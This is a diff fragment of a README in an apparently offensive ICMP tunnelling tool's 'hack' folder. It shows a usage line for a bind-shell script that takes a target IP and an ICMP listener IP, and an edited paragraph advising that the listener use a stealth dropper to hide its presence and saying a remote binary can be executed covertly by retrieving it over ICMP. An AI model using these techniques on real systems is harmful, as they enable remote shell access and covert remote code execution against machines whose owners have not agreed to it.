ariary/QueenSono/hack/README.md

 ./bindshell.sh <ip_target> <ip_listening_for_icmp>
 ```

 *Product placement: To be stealthly, you `listener` should use a dropper and hide its presence.
 You could find a stealth dropper example in [fileless-xec](https://github.com/ariary/fileless-xec) repo.
-Should I adapt it to use ICMP ? 🤔*
+You could stealthy execute a remote binary on local machine using ICMP to retrieve its content*

 ### One-liner redirect command output